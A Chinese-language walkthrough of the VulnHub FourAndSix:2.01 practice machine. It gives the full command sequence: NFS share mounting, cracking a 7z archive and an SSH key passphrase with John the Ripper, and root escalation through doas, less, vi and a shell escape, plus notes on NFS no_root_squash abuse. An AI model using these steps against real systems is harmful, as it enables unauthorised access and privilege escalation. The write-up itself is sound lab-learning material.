vulnhub靶机-FourAndSix:2.01（nfs端口共享7z压缩包暴力破解，less+vi提权）#

声明#

本文为个人跟随b站up主红队笔记学习vulnhub的FourAndSix:2.01靶机的复现通关记录，旨在分享靶机和记录学习心得体会，讲解若有谬误之处欢迎指正。
该靶机下载地址为’https://vulnhub.com/entry/fourandsix-201,266/‘

渗透流程#

在vmware部署靶机并开机后，打开kali对靶机进行信息收集，使用nmap执行nmap -sn 192.168.245.0/24(请替换成你的网段)进行主机发现，发现图中的192.168.245.159为靶机。（192.168.245.136为我的kali虚拟机的地址）
并进行端口发现，执行nmap --min-rate 10000 -p- 192.168.245.159，并对开放端口记录用于后续渗透，发现22、111、720、2049端口，并观察端口服务，2049端口为nfs文件共享服务，可以尝试寻找突破口。
对端口进行详细扫描，执行nmap -sT -sV -sC -O -p22,111,720,2049 192.168.245.159，得到端口详细服务内容和系统版本。
执行sudo nmap --script=vuln -p80,111,777 192.168.245.159用脚本扫一下漏洞，没有什么新发现。
执行 showmount -e 192.168.245.159目的为查看目标开了哪些 NFS 共享目录，获得路径/home/user/storage。
创建名为123的目录，执行sudo mount -t nfs 192.168.245.159:/home/user/storage 123，将共享文件夹目录链接到本地目录。
将其中的压缩包提取到本地目录，尝试解压缩，需要密码，尝试空密码无效。
执行7z2john backup.7z > backup7z_hash，从加密的 7z 压缩包中提取密码哈希值。
接着执行john --format=7z --wordlist=/usr/share/wordlists/rockyou.txt backup7z_hash进行破解，破解出密码为chocolate。
使用密码解压，查看内容，有八个图片，图像层面没有什么收获。
分别用file、binwalk、exiftool查看文件真实类型，有无捆绑，有无注释内容。
接下来查看很有价值的两个文件，公钥私钥文件。
用私钥文件进行ssh连接，需要passphrase说明私钥可能为加密，要对私钥解密。
使用ssh2john破解，类似7z2john的步骤，对私钥文件执行ssh2john id_rsa > id_rsa_hash。
执行john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash开始破解其passphrase，为12345678。
重新连接，成功获得初始shell。

提权过程#

查看用户，为用户组内user用户，find / -group user -type f 2>/dev/null搜索有权限文件，find / -perm -u=s -type f 2>/dev/null查找suid特权文件，看到doas，可以尝试通过doas提权。
打开doas.conf配置文件，这两行说明user能用less（一个文件查看工具）以root身份无密码打开/var/log/authlog，按照提示执行doas /usr/bin/less /var/log/authlog。
用less命令读日志，为提升权限状态查看，按键盘v打开vi编辑器，在vi编辑器中执行:!/sh，获得root权限。

其它补充#

对于doas的详细用法，可以参考’https://sspai.com/post/64843’,doas.conf作为给普通用户分配提权权限的配置文件，和sudoers比较相似，通过该文件可以引导提权的开展。
如果NFS文件共享服务出现目录/tmp * ,代表任何人能够挂载，可以尝试上传文件获取shell。
NFS 默认有 root_squash 规则，会限制提权，当为默认值root_squash时获取shell为低权限用户，值为no_root_squash时可以获取root的shell，值为all_squash时仅有读写权限，无法提权。